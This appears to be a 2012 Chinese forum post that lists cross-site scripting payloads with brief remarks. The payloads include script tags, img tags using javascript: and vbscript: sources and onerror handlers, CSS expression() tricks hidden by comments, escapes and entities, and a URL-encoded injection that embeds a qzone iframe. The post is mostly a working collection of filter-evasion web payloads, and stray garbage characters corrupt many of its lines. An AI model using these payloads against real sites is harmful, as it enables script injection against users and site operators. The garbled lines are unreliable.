<script>alert("跨站")</script> (最常用)( ^5 E9 m; R! t
<img scr=javascript:alert("跨站")></img>& f7 J: U+ j& z; w* C
<img scr="javascript: alert(/跨站/)></img>
( Y0 q$ @9 f& Y<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)) S. B% y2 m) }/ n) E
<img scr="#" onerror=alert(/跨站/)></img>
8 M# P6 d# U& `# h" g/ D$ J<img scr="#" style="xss:expression(alert(/xss/));"></img>7 {) Z- h) L$ r8 W4 t4 n
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释). X) x" T" j# X( H5 K2 ~9 J ]$ l4 z8 T
<img src=vbscript:msgbox ("xss")></img>
: R3 J. n; a! e+ y2 P! K<style> input {left:expression (alert('xss'))}</style>: ]% K& z+ G: j$ @: E; h$ }
<div style={left:expression (alert('xss'))}></div>
! v5 C5 H7 V# |3 G+ o+ V<div style={left:exp/* */ression (alert('xss'))}></div>5 ]3 A8 @& t% ?7 {9 W
<div style={left:\0065\0078ression (alert('xss'))}></div>5 q5 D; B7 C2 F$ M1 K! }- |
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
! _* @& m/ {2 U3 `; b5 [* Ounicode <div style="{left:expRessioN (alert('xss'))}">
' G4 D q+ |) I* t: D3 {' O: `5 {- O2 e3 u' g" u, |' p6 `
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
* b* p' _" g: g$ \" W0 U! Q$ [+ i |
发表于 2012-9-13 17:15:04
收藏
支持
反对